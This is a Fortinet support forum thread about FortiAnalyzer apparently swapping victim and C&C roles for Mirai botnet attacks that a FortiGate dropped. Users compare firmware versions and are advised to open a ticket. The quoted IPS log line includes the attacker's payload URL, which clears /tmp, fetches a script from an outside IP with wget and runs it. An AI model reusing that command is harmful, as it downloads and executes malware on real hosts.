Support Forum
The Forums are a place to find answers on a range of Fortinet products from peers and product experts.
bhb1958
New Contributor

Illogical reports from FortiAnalyzer

From time to time our FortiGate is logging botnet activity. When I look at the lines in our syslog server the traffic is listed as incoming from external hosts into our servers in DMZ. The lines show attempts to install and execute a script in e.g. /tmp, and shortly after the same external host tries to contact the same DMZ server through port 80. The log lines might look something like this;

 

2021-08-02T21:52:06.158389+02:00 10.1.255.242 date=2021-08-02 time=21:52:04 devname="??????" devid="FGT2KETBXXXXXXXX" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" eventtime=1627933925055431525 tz="+0200" severity="high" srcip=64.17.27.51 srccountry="United States"dstip=10.10.91.89 srcintf="Ytre-aggr" srcintfrole="wan" dstintf="DMZ-1-2" dstintfrole="undefined" sessionid=2238099031 action="dropped" proto=6 service="HTTP" policyid=237 attack="Mirai.Botnet" srcport=37935 dstport=80 hostname="127.0.0.1" url="/shell?cd+/tmp;rm+-rf+*;wget+ 209.141.41.11/jaws;sh+/tmp/jaws" direction="outgoing" attackid=43191 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID43191" incidentserialno=721445630 msg="backdoor: Mirai.Botnet," crscore=30 craction=8192 crlevel="high"

 

My interpretation of this is an attempt to infect our server – in other words we are the victim, and the external host is the attacker.

 

Our FortiGate is logging to a FortiAnalyzer at the same time as the syslog server, and after running the log through FortiAnalyzer this is reported the other way around. The external hosts are listed as “Victims” and our servers as “C&C”.

 

Why is FortiAnalyzer turning this around, and why is it written; direction="outgoing" in the log line ? Perhaps I have misunderstood the consept, and our servers are indeed infected ?

 

In addition to this all botnet activity is being dropped by the firewall so it really never reaches our DMZ server. Why is that not shown in the report ?

 

Regards

bhb1958

 

6 REPLIES 6
davidjcoglianese
New Contributor

We currently have a customer seeing similar logs with the victim being and external IP.

 

 

Debbie_FTNT

Hey david,

sorry to hear of your issues.

Can you let me know the firmware version of your FortiGate(s)? There was a known issue a while back about FortiGate logging the attack direction incorrectly, which could lead to FortiAnalyzer interpreting source and destinatinon (and thus victim and C&C server) incorrectly.

+++ Divide by Cucumber Error. Please Reinstall Universe and Reboot +++
Jirka1

Hey Debbie,

I confirm the same behavior with our customers in C&C Botnet detection through different versions of FortiOs and FAZ.

FGT version 6.4.9, 7.0.6, 7.2.1
FAZ version 7.0.4, 7.2.1

Jirka

Debbie_FTNT

Hey Jirka,

 

those are fairly recent firmware versions, so they should not be affected by the issue I mentioned, at least to my knowledge.

I would suggest a ticket with FortiGate and/or FortiAnalyzer team regarding this:
-> FortiGate likely reports the attack direction incorrectly

-> this causes FortiAnalyzer to report victim and C&C server incorrectly

The underlying issue is on FortiGate side, but FortiAnalyzer team does usually deal with at least some logging-related stuff on FortiGate side, so I'm not entirely sure which team woudl be the better fit.

A detailed explanation (with FortiAnalyzer report, raw log messagess, FortiGate config and network overview showing that the supposed C&C servers are actually internal servers and the victims) in the ticket would help the assigned engineers figure out who can best assist you in resolving this.

+++ Divide by Cucumber Error. Please Reinstall Universe and Reboot +++
davidjcoglianese

This is an 1801F running 6.4.10, so again a recent version.

 

The FAZVM is running v7.0.3-build0245 220202

Debbie_FTNT

Hey david,

same as I replied to Jirka - I would suggest a ticket with Technical Support to dig further into it.

+++ Divide by Cucumber Error. Please Reinstall Universe and Reboot +++
Labels
Top Kudoed Authors